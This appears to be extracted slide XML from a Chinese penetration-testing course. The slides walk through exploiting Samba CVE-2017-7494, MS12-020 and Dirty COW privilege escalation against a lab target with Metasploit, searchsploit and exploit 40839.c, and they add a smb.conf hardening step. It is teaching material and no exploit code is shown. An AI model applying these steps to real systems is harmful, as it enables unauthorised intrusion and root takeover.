            </a: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【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3502025" cy="4351655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、根据项目实施的步骤，完成CVE-2017-7494漏洞实现Samba远程代码执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、填写以下项目训练节点的名称或参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5603875" y="365125"/>
          <a:ext cx="5286375" cy="5812155"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1111250"/>
                <a:gridCol w="1706880"/>
                <a:gridCol w="2468245"/>
              </a:tblGrid>
              <a:tr h="241935">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项目名称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项目节点</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节点参数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rowSpan="5">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准备测试环境</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1、设置渗透机IP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2、设置靶机IP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3、检测靶安装Samba服务</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4、开启139、445端口</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5、网络互连互通</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rowSpan="5">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利用漏洞实现远程代码执行</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1、扫描目标靶机端口</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2、搜索漏洞利用模块</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3、设置目标靶机IP和端口</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4、执行攻击获取shell</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5、远程执行代码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rowSpan="2">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漏洞加固</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1、使用samba最新版本；</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4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2、修改smb.conf文件</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60081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605" y="1577975"/>
          <a:ext cx="5202555" cy="4871720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="1699895"/>
                <a:gridCol w="448945"/>
                <a:gridCol w="991870"/>
                <a:gridCol w="991870"/>
              </a:tblGrid>
              <a:tr h="408940">
                <a:tc gridSpan="5">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项目名称：利用CVE-2017-8464漏洞实现LINK文件远程代码执行</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0957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Samba服务CVE-2017-7494漏洞</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执行攻击获取</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>shell</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>并远程执行代码</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20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30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865">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3728085"/>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913765">
                <a:tc gridSpan="1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项目名称：利用CVE-2017-8464漏洞实现LINK文件远程代码执行</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67715">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039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269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3350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706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>修改smb.conf配置文件，使之修复漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="40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5955" y="435610"/>
            <a:ext cx="10515600" cy="5956300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤二 MS12-020漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 1.在Kali Linux终端界面中输入“msfconsole”命令，打开Metasploit框架，如图3-1-1所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 -2147482624" descr="图3-1-1打开Metasploit框架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1568450" y="2036445"/>
            <a:ext cx="7269480" cy="4095115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>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bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="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295705" y="-203755"/>
              <a:ext cx="1291989"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03</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altLang="zh-CN" sz="40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40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rPr>
              <a:t>3.3.1 利用CVE-2017-7494漏洞实现Samba远程代码执行</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4416425" y="5194935"/>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lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.2 利用CVE-CVE-2016-5195漏洞实现Linux系统本地提权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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200">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.2 利用CVE-CVE-2016-5195漏洞实现Linux系统本地提权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、学会利用CVE-2016-5195漏洞实现Linux系统本地提权。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>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2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2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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2665">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sz="2665">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2665">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目前主流系统都是多用户操作系统，同时可以登录多个用户，实现权限的隔离，针对不同的应用，不同的账户具有不同的权限；如管理账户与普用户账户之间的不同。本地提权一般用于已经获取到了本地低权限的账号，希望获取更高的权限，实现对目标的进一步控制；权限控制是操作系统安全的基本，本地提权在攻击者入侵过程中起到重要的作用。本项目将通过CVE-2016-5195漏洞实现Linux系统本地提权的渗透测试，从而介绍Linux服务漏洞。洞。</a:t>
            </a:r>
            <a:endParaRPr sz="2665">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="106680"/>
            <a:ext cx="11732260" cy="508000"/>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2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200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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911225" y="1676400"/>
            <a:ext cx="10459085" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Linux系统漏洞（CVE-2016-5195），也叫脏牛（Dirty COW）漏洞，该漏洞是Linux的一个本地提权漏洞，其漏洞危害是低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权，甚至可以达到root的权限，从2.6.22起的所有Linux内核版本都受影响，直到2016年10月18日才修复。该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中，可能产出竞态条件造成COW过程被破坏，导致出现写数据到进程地址空间内只读内存区域的机会。当向带有MAP_PRIVATE标记的只读文件映射区域写数据时，会产生一个映射文件的复制(COW)，对此区域的任何修改都不会写回原来的文件，如果上述的竞态条件发生，就能成功的写回原来的文件，比如修改su或者passwd程序就可以达到获取root权限的目的。。</a:t>
            </a:r>
            <a:endParaRPr sz="24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1699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sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>    网络管理员小王在对公司的LINUX服务器进行安全检查测试时，发现服务器的一个普通用户可以通过本地提权的方式达到root管理员的权限，这一发现使他大吃一惊，如果所有的普通用户都能提权为管理员用户的权限，那么对服务器的安全是极危险的，黑客更可以通过无限的权限控制服务器，因此，对服务器进行了测试。</a:t>
            </a:r>
            <a:endParaRPr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3.3.1 利用CVE-2017-7494漏洞实现Samba远程代码执行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6127115" cy="1420495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="826135"/>
                <a:gridCol w="1927225"/>
                <a:gridCol w="2315210"/>
                <a:gridCol w="105854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CenterOS6-1</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192.138.66.30</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靶机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948690" y="4390390"/>
            <a:ext cx="6816725" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>已知靶机test账号及密码，开启22端口，网络互连互通。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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2900"/>
            <a:ext cx="10515600" cy="5961380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤二，CVE-2016-5195漏洞利用设置 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.用nmap 192.168.66.30扫描靶机开启端口状态，发现22端口开启，可以使用SSH连接登陆，如图3-3-8所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236595" y="6184265"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-3-8 扫描靶机开启端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482624"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2066925"/>
            <a:ext cx="9340850" cy="3782695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>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48665" y="189865"/>
            <a:ext cx="10515600" cy="5276215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>2.在Kali Linux终端界面中输入“searchsploit dirty”命令，搜索dirty的利用模块，发现有40839.c针对dirty漏洞提权的模块，路径为linux/local/40839.c</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>,如图3-3-9所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3456305" y="5825490"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr b="0"/>
              <a:t>图3-3-9搜索dirty的利用模块</a:t>
            </a:r>
            <a:endParaRPr b="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052195" y="1442085"/>
            <a:ext cx="9906000" cy="438277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56235"/>
            <a:ext cx="10515600" cy="5821045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3.使用漏洞检测模块“use auxiliary/scanner/rdp/ms12_020_check” ，用“show options”命令查看配置参数，提示需配置RHOST IP地址，默认端口3389，如图3-1-3所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482622" descr="图3-1-3  检测可利用漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2044065" y="2044700"/>
            <a:ext cx="6493510" cy="3556000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2853055" y="580898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3-1-3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>检测可利用漏洞</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57175"/>
            <a:ext cx="10515600" cy="5821045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>3.使用普通用户test,用命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>cp /usr/share/exploitdb/exploits/linux/local/40839.c test@192.168.66.30:/tmp 将Kali中的40893.c文件上传到靶机的/tmp目录下，因为/tmp目录对普通用户也可以读写，为下一步的利用做好准备，如图3-3-10所示，文件成功上传。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482622" descr="4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="946785" y="1822450"/>
            <a:ext cx="10297795" cy="1252220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3522980" y="3164840"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-3-10上传40893.c文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946785" y="3514090"/>
            <a:ext cx="10297795" cy="2481580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.用ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>test@192.168.66.30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>远程登陆靶机，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>uname –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>r命令查看靶机的内核是不在漏洞利用范围，如图3-3-11所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="946785" y="4124325"/>
            <a:ext cx="10297795" cy="1687195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3522980" y="6078220"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-3-11连接靶机并查看内核版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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50825"/>
            <a:ext cx="10515600" cy="5923915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>5.成功登陆后，进入/tmp目录，用ls命令查看,发现已成功上传40839.c文件，如图3-3-12所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482620" descr="tmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
